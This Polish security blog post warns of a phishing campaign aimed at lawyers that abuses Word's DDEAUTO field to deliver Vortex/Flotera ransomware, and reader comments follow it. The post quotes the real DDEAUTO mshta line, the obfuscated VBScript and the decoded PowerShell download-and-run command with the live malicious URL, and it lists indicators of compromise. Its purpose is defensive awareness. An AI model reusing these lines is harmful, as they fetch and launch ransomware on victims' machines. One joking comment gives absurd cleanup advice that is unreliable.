14.10.2017 | 22:42

avatar

Adam Haertle

Uwaga na nowy atak wykorzystujący najnowszą sztuczkę z Wordem

Seria ataków na prawników trwa od kilku dni, ale ten jest inny od pozostałych, ponieważ wykorzystuje odkrytą dosłownie kilka dni temu sztuczkę w Wordzie, pozwalającą na uruchomienie kodu bez użycia makro.

Jesteśmy naprawdę pod wrażeniem tempa adopcji nowinek ze świata cyberprzestepców na naszym lokalnym rynku. Zaledwie pięć dni temu opisano metodę wykonania kodu w dokumencie Microsoft Word, a już dzisiaj w nasze ręce trafiła próbka naszego ulubionego polskiego hakera, Tomka, która wykorzystuje tę sztuczkę.

Wezwanie do zaniechania czynów nieuczciwej konkurencji oraz naruszających dobra osobiste

Tomek zazwyczaj swoje emaile opiera o wykradzione wiadomości z cudzych skrzynek i zapewne podobnie jest także teraz. Wiadomość ma temat „Wezwanie do zaniechania czynów nieuczciwej konkurencji oraz naruszających dobra osobiste” i wygląda tak:

Nadawca podszywa się pod istniejącą kancelarię i tradycyjnie, jak w poprzednich 20 czy 30 kampaniach, nadana jest z serwerów Nazwa.pl:

Received: from aom185.rev.netart.pl (85.128.247.185) by
Received: from poczta.nazwa.pl (unknown [10.252.0.25])

W załączniku do wiadomości znajduje się plik Wezwanie 14_11_2017.doc, który niestety nie jest wykrywany jako złośliwy przez programy antywirusowe. Co więcej, nie jest to tradycyjny złośliwy plik proszący o uruchomienie makro (Włącz zawartość). Okna dialogowe wyglądają zupełnie inaczej i Wasi pracownicy pewnie ich jeszcze nie widzieli. Pokażcie im poniższe ekrany i ostrzeżcie przed trwającymi atakami.

Kto by nie chciał zaktualizować dokumentu?

Tak wygląda przebieg ataku, a w środku dokumentu znajdziecie po prostu ciąg:

DDEAUTO c:\\windows\\system32\\mshta.exe "http://w-szczecin.pl/xml/nowywin.hta

Pod adresem pobieranym i wykonywanym w przypadku gdy użytkownik kliknie w zły guzik znajduje się następujący kod:

Dim Doda18 : Dim AnitaU : SeT Doda18 = cREateOBJect ( "wsCrIPt.sHELl" ) : AnitaU = " powERSHEll.exe -ExeCUtIonPolIcY byPasS -WINdowSTYLE hiddEn -ENCodedcOMMANd UABvAHcAZQByAFMAaABlAGwAbAAgAC0ARQB4AGUAYwB1AHQAaQBvAG4AUABvAGwAaQBjAHkAIABiAHkAcABhAHMAcwAgAC0AbgBvAHAAcgBvAGYAaQBsAGUAIAAtAHcAaQBuAGQAbwB3AHMAdAB5AGwAZQAgAGgAaQBkAGQAZQBuACAALQBjAG8AbQBtAGEAbgBkACAAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQARgBpAGwAZQAoACcAaAB0AHQAcAA6AC8ALwB3AC0AcwB6AGMAegBlAGMAaQBuAC4AcABsAC8AeABtAGwALwBzADUAMAAuAGUAeABlACcALAAdICQAZQBuAHYAOgBBAFAAUABEAEEAVABBAFwAbgB2AHMAdABhAHIAdAAuAGUAeABlAB0gKQA7AFMAdABhAHIAdAAtAFAAcgBvAGMAZQBzAHMAIAAoAB0gJABlAG4AdgA6AEEAUABQAEQAQQBUAEEAXABuAHYAcwB0AGEAcgB0AC4AZQB4AGUAHSApAA== " : Doda18.RUN CHr ( 34 ) & Doda18.eXPanDenVIroNmEntsTRiNGS( "%COMSpEC%" ) & cHR ( 34 ) & CHr ( 34 ) & "/c " & AnitaU & chr ( 34 ) , 0 : SEt Doda18 = NOTHInG

Po zdekodowaniu najważniejszego fragmentu otrzymujemy:

PowerShell -ExecutionPolicy bypass -noprofile -windowstyle hidden -command (New-Object System.Net.WebClient).DownloadFile('http://w-szczecin.pl/xml/s50.exe', $env:APPDATA\nvstart.exe );Start-Process ( $env:APPDATA\nvstart.exe )

a w pliku s50.exe znajdziemy ransomware Vortex / Flotera – podpis Tomka (wariant z adresami [email protected] lub [email protected]). Na szczęście kilka przyzwoitych antywirusów już wykrywa ten egzemplarz.

Ostrzeżcie znajomych i pracowników

Rzadko się zdarza, by w atakach na skrzynki Polaków pojawiło się coś nowego. Zapewne praktycznie każdy odbiorca opisanego powyżej emaila takie okna dialogowe w Wordzie zobaczy pierwszy raz w życiu. Warto by wiedział, że nie powinien klikać, tylko zamykać.

Właśnie przed takimi atakami ostrzegamy na naszych szkoleniach, gdzie pokazujemy tylko realne zagrożenia, na które trafiali w ostatnich miesiącach pracownicy polskich firm. Jedną z próbek tego ataku otrzymaliśmy własnie od uczestnika naszego szkolenia, który prawidłowo rozpoznał podstęp złoczyńców („bo pan Adam mówił, żeby w otwartym dokumencie w nic nie klikać bo może kryć się zło”). Chętnie pokażemy w Waszej firmie kilkadziesiąt prawdziwych ataków (również ten, bo właśnie dodajemy slajdy).

Security Awareness - szkolenie dla personelu

Podziękowania dla Krystiana i Marcina, którzy podesłali próbki.

IOC:

91.231.140.161:80
77.222.42.240:80
w-szczecin.pl
okocim-browar.eu
bbff3bd6722baaf7adebffa8ee0923d0a5eff5a6
8774e0a70cba7efe8ae10568f5be537b40f696d1

 

Powrót

Komentarze

  • avatar
    2017.10.14 22:49 krzyszof

    i znow ta bezieczna nazwa co php 5.4 uzywa :)

    Odpowiedz
  • avatar
    2017.10.15 00:17 Hau Hau

    „naszego ulubionego polskiego hakera, Tomka”
    .
    No nie, nie wierzę…
    Adamie, od kiedy to przestępcę i wieśniaka Thomasa, czule nazywasz „Tomkiem”?
    Może jeszcze go pozdrowisz, zamiast życzyć mu rychłego spotkania z Psiarnią a potem długiego tournee we więźniu?

    Odpowiedz
    • avatar
      2017.10.15 09:04 joe

      Podobno prawdziwy Thomas nie zajmuje się wynajdowaniem luk w zabezpieczeniach tylko sam je tworzy. Jest ze wsi i kiedyś na wieś wróci a kiedy nie jest przestępcą pluje korporacyjnym włodarzom do zupy – i ma już swoich fanów np: FanTomas.

      Odpowiedz
      • avatar
        2017.10.15 13:10 Hau Hau

        „wieśniak” to przede wszystkim stan umysłu a nie pochodzenie społeczne. Można być wieśniakiem z miasta i wielu takich jest.
        W przypadku zasrańca Thomasa nie jest ważne czy naprawdę pochodzi z wiochy, tylko to że wiochę ma swojej w głowie.

        Odpowiedz
    • avatar
      2017.10.15 09:09 Janek

      To była ironia Watsonie

      Odpowiedz
      • avatar
        2017.10.15 13:13 Hau Hau

        Oczywiście że ironia, wiedziałem o tym Sherlocku

        Odpowiedz
    • avatar
      2017.10.15 10:13 ifeq

      On nakręca im biznes szkoleniowy. Wystarczy zauważyć ich bezceremonialną autoreklamę w artykule.

      Odpowiedz
    • avatar
      2017.10.16 10:42 lol

      Masz racje, zamiast nazywać go Tomkiem powinien nazywać go Romkiem.

      Odpowiedz
  • avatar
    2017.10.15 00:48 wiesios

    Dostałem tego maila dzisiaj i zauważyłem że rzeczony Tomek nie jest specjalnie dbały o szczegóły. Adres odbiorcy jest ten sam co adres nadawcy. I słusznie. Sam powinien sobie klikać w załącznik i nie zawracać ludziom gitary.

    Odpowiedz
  • avatar
    2017.10.15 08:12 Cxx

    Wirlka nagonka na Kasperskiego a jak sie okazuje jako jeden z 2 antywirusow wykrywa to zagrozenie :-)

    Odpowiedz
    • avatar
      2017.10.15 12:14 Morph

      Kaspersky po prostu ukradł pliki od Tomka ;)

      Odpowiedz
  • avatar
    2017.10.16 08:12 qwas

    Autopromocja nie hańbi.

    Odpowiedz
  • avatar
    2017.10.16 08:55 Michał

    Skoro zachęcacie do pokazywania tego pracownikom, to warto by było zamieszczać ekrany z polskiego Worda.

    Odpowiedz
  • avatar
    2017.10.16 09:31 PiotrLenarczyk

    Jeszcze takiego antywirusa, co promuje stosowanie znacznie bardziej życiowo przydatnych, sprzętowych zapór sieciowych to nie znam. Zresztą i tak wystarczy iść do wypożyczalni kostiumów po strój kominiarza sprawdzającego wentylację grawitacyjną. Po obczajeniu wyglądu mieszkania, z filmu kupuje się taką samą lampkę/doniczkę/co tam bądź klawiaturę i medianowo wszędzie to samo hasło tekstem jawnym gotowe. Znakomita większość okien PCV jest zwyczajnie otwieralna, a bardziej zaawansowane triki jak ten tutaj opisany to raczej podprokuratorskie przedsięwzięcia dorosłych 16’latków. Jako były ekspert od dobrego teleinformatycznego bezpiecznego wrażenia, tłumaczący dlaczego lepiej płacić za opinie ekspertów RISC’o (stwierdzam, że rzeczywiście się włamali, musimy z należytą starannością sprawdzić wszelkie dane) uważam, że większość zabezpieczeń jest bezsensu – lepiej jest trzymać dane jawnie na projektach otwartych.

    Odpowiedz
  • avatar
    2017.10.16 09:39 PiotrLenarczyk

    Wie ktoś może, jak z bytecode usunąć prostą pętlę asm(„nop”) zakończoną return 0 tuż na początku ciała głównej funkcji? Słyszałem, że naprawdę nie ma wirusów na LINUX’a, bo te co są to działają wszędzie.

    Odpowiedz
  • avatar
    2017.10.16 15:51 mailo

    Pytanie. Czy dotyczy to Word MS czy każdego edytora?

    Odpowiedz
  • avatar
    2017.10.16 21:25 Obserwator

    Niestety, już wykrywa tego trojana:
    clamdscan s50.exe
    /home/pacjent/Desktop/s50.exe: Win.Trojan.Agent-6348325-0 FOUND

    ———– SCAN SUMMARY ———–
    Infected files: 1
    Time: 0.261 sec (0 m 0 s)

    Pozdro

    Odpowiedz
  • avatar
    2017.10.16 23:00 Dawidos

    Telefony w mailu też spreparowane ?
    bo telefon jeszcze należy do środka komunikacji
    i można łatwo zweryfikować czy to fake

    Odpowiedz
  • avatar
    2017.10.17 09:41 Mariusz

    Ta sama metoda jest używania już w mailach niby preawizujących przesyłkę DHL.

    Odpowiedz
    • avatar
      2017.10.17 17:19 gom1

      Dzisiaj rano przyszło takie „powiadomienie” z DHL na biurową skrzynkę firmową. W treści imię i nazwisko prezesa (prawidłowe). Wiadomość wygląda bardzo wiarygodnie. Dobrze, że dziewczyny z recepcji używają LibreOffice, bo na bank dałyby się złapać.

      Odpowiedz
  • avatar
    2017.10.18 22:25 krzysiek

    a jak sie pozbyc tego, gdy przez nieuwage padlem ofiarą ?

    Odpowiedz
    • avatar
      2017.10.19 11:40 Mucha Dzoanna

      Polej komputer octem i zasyp sodą oczyszczoną na 2-3 godziny. Później spłucz wodą demineralizowaną z domieszką cytryny. U mnie pomogło.

      Aha! Oczywiście wszystko na wyłączonym zasilaniu z gniazdka.

      Odpowiedz
  • avatar
    2017.10.19 14:03 tomek_ale_nie_ten

    „Na szczęście kilka przyzwoitych antywirusów już wykrywa ten egzemplarz.”
    Masło maślane. Zdanie z którego nic nie wynika i które mogłoby nie istnieć
    Nie można było napisać Na dzień xx.xx.xx zagrożenie jest wykrywane przez następujące AV.

    Odpowiedz

Zostaw odpowiedź do Hau Hau

Jeśli chcesz zwrócić uwagę na literówkę lub inny błąd techniczny, zapraszamy do formularza kontaktowego. Reagujemy równie szybko.

Uwaga na nowy atak wykorzystujący najnowszą sztuczkę z Wordem

Komentarze